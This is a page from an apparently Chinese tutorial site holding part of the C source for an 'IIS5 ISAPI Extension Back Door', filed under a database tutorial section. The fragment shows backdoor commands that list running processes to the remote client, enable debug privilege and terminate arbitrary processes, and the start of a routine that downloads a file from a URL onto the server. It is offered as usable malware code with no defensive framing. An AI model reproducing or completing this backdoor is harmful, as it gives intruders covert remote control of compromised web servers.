Mssql教程《IIS5 ISAPI Extension Back Door》

您现在的位置： e股脑 >> 数据库 >> Mssql教程 >> IIS5 ISAPI Extension Back Door >> 教程正文

教程搜索

图文教程

赞助商

IIS5 ISAPI Extension Back Door

来源：e股脑
点击次数：
更新时间：2007-8-9

SendToClient( pECB , "List process information error...\n" );

SendToClient( pECB , FLAG );

CloseHandle( hProcessSnap );

return;

}

SendToClient( pECB , "PID\t\tProcessName\n" );

{

ZeroMemory( psBuff , sizeof(psBuff) );

sprintf( psBuff , "%d\t\t%s\n", pe32.th32ProcessID , pe32.szExeFile );

SendToClient( pECB , psBuff );

}

while( Process32Next( hProcessSnap, &pe32 ) );

return;

}

void Kill( LPVOID arg )

{

WORKARG *workArg = (WORKARG *)arg;

HANDLE hProcess = NULL;

DWORD pID;

EXTENSION_CONTROL_BLOCK *pECB = workArg->pECB;

HANDLE hToken;

LUID sedebugnameValue;

TOKEN_PRIVILEGES tkp;

pID = atoi( workArg->arg );

if ( !OpenProcessToken( GetCurrentProcess() , TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY , &hToken ) )

{

#ifdef DEBUG

LogStrToFile( "Call OpenProcessToken error" );

LogIntToFile( GetLastError() );

#endif

SendToClient( pECB , "Kill process error...\n" );

return;

}

if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )

{

#ifdef DEBUG

LogStrToFile( "Call LookupPrivilegeValue error" );

LogIntToFile( GetLastError() );

#endif

SendToClient( pECB , "Kill process error...\n" );

return;

}

tkp.PrivilegeCount = 1;

tkp.Privileges[0].Luid = sedebugnameValue;

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL );

CloseHandle( hToken );

hProcess = OpenProcess( PROCESS_TERMINATE , FALSE , pID );

if( hProcess ==INVALID_HANDLE_VALUE || hProcess == NULL )

{

#ifdef DEBUG

LogStrToFile( "Call OpenProcess error" );

LogIntToFile( GetLastError() );

#endif

SendToClient( pECB , "Kill process error...\n" );

CloseHandle( hToken );

CloseHandle( hProcess );

return;

}

if ( !TerminateProcess( hProcess, (DWORD) -1 ) )

{

#ifdef DEBUG

LogStrToFile( "Call TerminateProcess error" );

LogIntToFile( GetLastError() );

#endif

SendToClient( pECB , "Kill process error...\n" );

CloseHandle( hToken );

CloseHandle( hProcess );

return;

}

SendToClient( pECB , "killed ok\n" );

CloseHandle( hToken );

CloseHandle( hProcess );

return;

}

void DownLoad( LPVOID arg )

{

WORKARG *workArg = (WORKARG *)arg;

char fileName[64] = { 0 };//保存的文件名

char fullPath[256] = { 0 };//保存的完整地址

char url[ARGSIZE] = { 0 };//下载的URL

char seps[] = "/";//分割字符

char *token;

int ret = 0;

EXTENSION_CONTROL_BLOCK *pECB = workArg->pECB;;

strcpy( url , workArg->arg );

上一页 1 2 3 4 5 6

上一篇教程： char与varchar的区别

下一篇教程： mysql数据库连接过多的错误，可能的原因分析及解决办法